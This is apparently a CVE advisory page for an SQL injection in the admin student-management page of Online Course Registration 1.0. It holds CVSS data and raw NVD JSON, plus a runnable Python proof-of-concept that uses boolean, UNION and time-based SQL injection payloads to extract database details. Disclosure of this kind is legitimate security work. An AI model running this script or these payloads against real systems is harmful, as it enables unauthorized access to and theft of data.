CVE-2025-11329

Description

A flaw has been found in code-projects Online Course Registration 1.0. Impacted is an unknown function of the file /admin/manage-students.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_course_registration_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Course Registration 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11329 - SQL Injection PoC
# Target: code-projects Online Course Registration 1.0
# Vulnerable file: /admin/manage-students.php
# Vulnerable parameter: ID

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
VULN_PATH = "/admin/manage-students.php"

def check_sqli(target):
    """Check if the target is vulnerable to SQL injection"""
    # Normal request
    normal_payload = {"ID": "1"}
    try:
        r_normal = requests.get(f"{target}{VULN_PATH}", params=normal_payload, timeout=10)
        normal_len = len(r_normal.text)
    except Exception as e:
        print(f"[ERROR] Connection failed: {e}")
        return False

    # Boolean-based injection test
    true_payload = {"ID": "1' AND '1'='1"}
    false_payload = {"ID": "1' AND '1'='2"}
    try:
        r_true = requests.get(f"{target}{VULN_PATH}", params=true_payload, timeout=10)
        r_false = requests.get(f"{target}{VULN_PATH}", params=false_payload, timeout=10)
        if len(r_true.text) != len(r_false.text) and len(r_true.text) == normal_len:
            print("[+] Target is vulnerable to boolean-based SQL injection!")
            return True
    except Exception as e:
        print(f"[ERROR] Injection test failed: {e}")
    return False

def exploit_sqli(target):
    """Exploit SQL injection to extract database information"""
    # Extract database version
    payload = {
        "ID": "1' UNION SELECT 1,version(),database()-- -"
    }
    try:
        r = requests.get(f"{target}{VULN_PATH}", params=payload, timeout=10)
        print(f"[+] Response:\n{r.text}")
    except Exception as e:
        print(f"[ERROR] Exploitation failed: {e}")

def time_based_sqli(target):
    """Time-based blind SQL injection"""
    import time
    payload = {"ID": "1' AND SLEEP(5)-- -"}
    start = time.time()
    try:
        requests.get(f"{target}{VULN_PATH}", params=payload, timeout=15)
    except Exception:
        pass
    elapsed = time.time() - start
    if elapsed >= 5:
        print("[+] Target is vulnerable to time-based blind SQL injection!")
    else:
        print("[-] Target may not be vulnerable to time-based injection.")

if __name__ == "__main__":
    print(f"[*] Testing target: {TARGET_URL}")
    if check_sqli(TARGET_URL):
        exploit_sqli(TARGET_URL)
    else:
        time_based_sqli(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11329
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11329
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11329/
[4] VulDB https://vuldb.com/cve/CVE-2025-11329
[5] https://code-projects.org/
[6] https://github.com/yihaofuweng/cve/issues/46
[7] https://vuldb.com/?ctiid.327212
[8] https://vuldb.com/?id.327212
[9] https://vuldb.com/?submit.664538

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11329", "sourceIdentifier": "[email protected]", "published": "2025-10-06T09:15:33.940", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Online Course Registration 1.0. Impacted is an unknown function of the file /admin/manage-students.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_course_registration_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B4BF34E-63E6-4ED5-BF47-71CD12BFB06C"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yihaofuweng/cve/issues/46", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327212", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327212", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664538", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}